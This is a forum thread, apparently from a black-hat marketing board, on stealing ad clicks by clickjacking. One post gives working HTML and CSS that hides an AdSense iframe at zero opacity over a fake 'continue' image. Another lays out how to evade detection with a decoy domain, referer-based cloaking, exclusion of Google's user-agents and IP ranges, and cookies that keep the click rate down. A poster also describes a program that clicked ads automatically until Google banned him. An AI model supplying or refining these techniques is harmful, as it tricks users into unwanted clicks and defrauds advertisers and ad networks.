Stealing from Google or altervatives. (100% CTR)

Status
Not open for further replies.
Is there a way to use this in wordpress? Faking a video in a post?
 
sometimes you have to be little naughty, but always keep an eye on your back
 
Ok some n00b questions:
1.What do u use it with Adsense+pc+what?
2. To the rotation script you put fully code of Harro or just affiliates?? Im n00b in that so plz give some better xplanation
3. How to encrypt the php code? :)
Thanx!!
 
Does anyone have any idea how to create a php code that say for example if the ad code is generated (after the number is randomized) then when the user clicks on the ad code it pops up the ad and THEN runs the video?

I would appreciate any help on this as Im currently stuck and cannot find a way to do it....

Im fairly new to php so please hold back on the 'idiot' calls :)

thanks guys!

by the way this forum rocks..
 
Does anyone have any idea how to create a php code that say for example if the ad code is generated (after the number is randomized) then when the user clicks on the ad code it pops up the ad and THEN runs the video?

I would appreciate any help on this as Im currently stuck and cannot find a way to do it....

Im fairly new to php so please hold back on the 'idiot' calls :)

thanks guys!

by the way this forum rocks..

dude im not good with php either bt i think thats kind of impossible. id be happy to be proved wrong tho.
 
If you use this technique, won't G see the impression coming from the BH page? I ran a test and all of the adds were related to the BH page and not the WH page where the adsense code is.

If I were to use this technique, I would use the following precautions:

1. I would use two domains; a blackhat and whitehat domain The WH domain would be a page containing a legit looking website with AdSense on it. The BH domain would contain our overlay code and would be the domain I would be "promoting" all around the 'net. Instead of putting the AdSense code on the BH domain, I would instead iframe the WH domain behind the overlay image. This way G "sees" all impressions/clicks coming from the WH domain :p I would also show a cloaked version of the WH page to the BH page by checking the referer on the WH domain. If the referer is that of the BH page, then return an optimized-for-AdSense version of the WH site to the BH page's iframe.

2. Keep the CTR down by only showing the overlay every so often.

3. Try as much as possible to exclude G's User-Agents and IP ranges from being shown the overlay!

4. Use cookies! Each time a visitor visits the BH domain, and the overlay is presented, a cookie would be set on the visitor's computer indicating that the overlay has been triggered. If the visitor returns to the page in the future, and they still have the cookie, then they will be shown the a real link to the video or whatever.


These methods should make it difficult for G and others to detect...
 
Did this method looooooong back!!! Now or later Google will find you and ban ur ass.. That's what happened with me...
 
This code creates an invisible iframe on your page and puts the Adsense code inside. But since the only thing inside this iframe is the Adsense code itself, how will Google know which ads to show on your page?

Here's the code:

Code:
        <style>
            iframe{
                opacity: 0;
                border: 0px none transparent;
                position: absolute;
                top: 0px;
                left: 0px;
                height: 300px;
                width: 250px;
                filter:alpha(opacity=0);
            }
            img{
                position: absolute;
                top: -50px;
                left: 0px;
                height: 300px;
                width: 250px;
            }
        </style>
    </head>
    <body>
        <div>

            <img src="http://healthcenter.uoregon.edu/images/continue.gif"/>
            <script type="text/javascript"><!--
            google_ad_client = "pub-1234567890123456";
            google_ad_width = 300;
            google_ad_height = 250;
            google_ad_format = "300x250_as";
            google_ad_type = "image";
            google_ad_channel = "4479800422";
            //--></script>

            <script type="text/javascript"
              src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
            </script>
        </div>
    </body>
wow...great
 
Cheers Harro!!

I think i'll knock up a quick website and put some sort of advertising code in it and try your technique....

Id love it if it works well!!!....

Love ya posts dude...
 
Oh also does anyone recommend a ppc provider that doesnt get p1ssed and ban you when you start making money?

Im using google adsense for my legit website and I dont want to ruin that by trying this method with it...

Id rather try it with some other provider that isnt quite as intelligent! :)

I previously released a free excel program which hit my website and clicked an ad every so often....:) When i made $200 in 4 weeks google banned me...
 
would this work with an openx tag? i mean the url rotator
sorry noob in blackhat
when i understand it right i need the url rotator to get an other banner every click?
i have an openx server running so i could probally tweak it so it rotates every click
sounds great, dunno if it is, but you can feed the openx with as many ads you want for this project?
and why not use ioncube or zend to encrypt it
i would preffer zend as it installed on many hosting compagnies
 
I built the most sophisticated script out here... But the problem with adbrite, when the ad is showing the layer (CONTINUE BUTTON) it is not showing the layer... When layer is visible the ad is not being shown..

can anyone give me some suggestion what can I do?


Please give me a working adbrite example... I'm starting to fuck adbrite.. Thanks
 
Status
Not open for further replies.
Back
Top